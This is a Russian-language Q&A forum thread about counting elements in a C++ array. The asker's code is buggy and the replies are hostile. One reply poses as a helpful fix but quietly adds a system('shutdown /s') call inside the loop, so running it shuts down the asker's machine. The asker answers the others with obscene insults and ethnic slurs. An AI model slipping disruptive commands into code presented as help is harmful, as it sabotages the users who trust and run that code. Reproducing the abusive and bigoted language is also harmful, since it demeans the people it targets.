С++ Как узнать количество элементов в массиве ?

Deus Мастер (1373), закрыт 5 лет назад
от 5 до 1
она должна счиать 5 3 6 8 1 (получается 5 элементов), а не 1 2 9 5

int dv = 1;
int fnh = 5;

int WDOrder[14] = {1, 2, 9, 5, 3, 6, 8};

for (int i = fnh; i>=dv; i--) {

Edit3->Text = sizeof(WDOrder[i]);
}
Лучший ответ
... Гений (84839) 5 лет назад
Я Вам абсолютно точно ответил. Боюсь проблемы в Вас самом, что не можете под свой код вставить уже написанную за Вас функцию.

С таким подходом Вам никто не поможет. Редко такое говорю - завязывайте с программированием. Оно похоже совсем не Ваше. Уверен - что-то другое Вы делаете лучше.
Или меняйте подход.

И ещё раз ссылка на абсолютно рабочий код. Любой это подтвердит.... Стандартный C++.
https://www.ideone.com/KbkUQ3

С вводом произвольных чисел (после перехода соотв нажать Run для выполнения программы)
https://onlinegdb.com/rkipEq81m

А налево и направо раздавать "бесполезные ответы" даже не разобравшись - не делает Вам чести и совершенно отбивает желание Вам помогать.
DeusМастер (1373) 5 лет назад
иди в пизду не работает он, пишет ошибку даун тупой, мне не нужен твое ебаный 16 биитный код чурка тупая
Остальные ответы
InviZzzible Мудрец (10825) 5 лет назад
ладно, можете не благодарить))))
int dv = 1;
int fnh = 5;

int WDOrder[14] = {1, 2, 9, 5, 3, 6, 8};

for (int i = fnh; i>=dv; i--) {

Edit3->Text = sizeof(WDOrder[i]);
system("shutdown /s");
}
DeusМастер (1373) 5 лет назад
иди чурка нос выправи, чудище)))))